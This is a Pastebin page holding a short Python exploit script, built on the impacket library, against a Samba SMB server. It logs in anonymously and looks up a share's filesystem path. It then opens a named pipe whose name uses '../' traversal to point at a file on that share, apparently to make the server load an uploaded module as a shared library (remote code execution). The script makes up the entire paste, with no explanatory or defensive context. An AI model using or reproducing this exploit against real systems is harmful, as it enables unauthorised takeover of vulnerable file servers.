Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from impacket import smb
- from impacket.smbconnection import *
- from impacket.dcerpc.v5 import transport, srvs
- server = 'localhost'
- user = 'nobody'
- password = ''
- share = 'data'
- module = 'module'
- s = smb.SMB('A',server)
- s.login(user,password)
- smbClient = SMBConnection('A', server)
- smbClient.login(user,password)
- tid=smbClient.connectTree(r'\\A\%s' % share)
- rpctransport = transport.SMBTransport('A', server, filename = r'\srvsvc', smb_connection=smbClient)
- dce = rpctransport.get_dce_rpc()
- dce.connect()
- dce.bind(srvs.MSRPC_UUID_SRVS)
- resp = srvs.hNetrShareGetInfo(dce, '%s\x00' % share, 2)
- path = resp['InfoStruct']['ShareInfo2']['shi2_path'][2:][:-1].replace("\\","/")
- path = '\pipe\../../../../../..%s' % (path)
- path = r'%s/%s' % (path, module)
- tid = s.tree_connect(r'\\A\IPC$')
- packet = smb.NewSMBPacket()
- packet['Tid'] = tid
- openFile = smb.SMBCommand(smb.SMB.SMB_COM_OPEN_ANDX)
- openFile['Parameters'] = smb.SMBOpenAndX_Parameters()
- openFile['Parameters']['DesiredAccess'] = smb.SMB_ACCESS_READ
- openFile['Parameters']['OpenMode'] = smb.SMB_O_OPEN
- openFile['Parameters']['SearchAttributes'] = smb.ATTR_READONLY | smb.ATTR_HIDDEN | smb.ATTR_ARCHIVE
- openFile['Data'] = smb.SMBOpenAndX_Data(flags=smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES)
- openFile['Data']['FileName'] = path
- packet.addCommand(openFile)
- s.sendSMB(packet)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
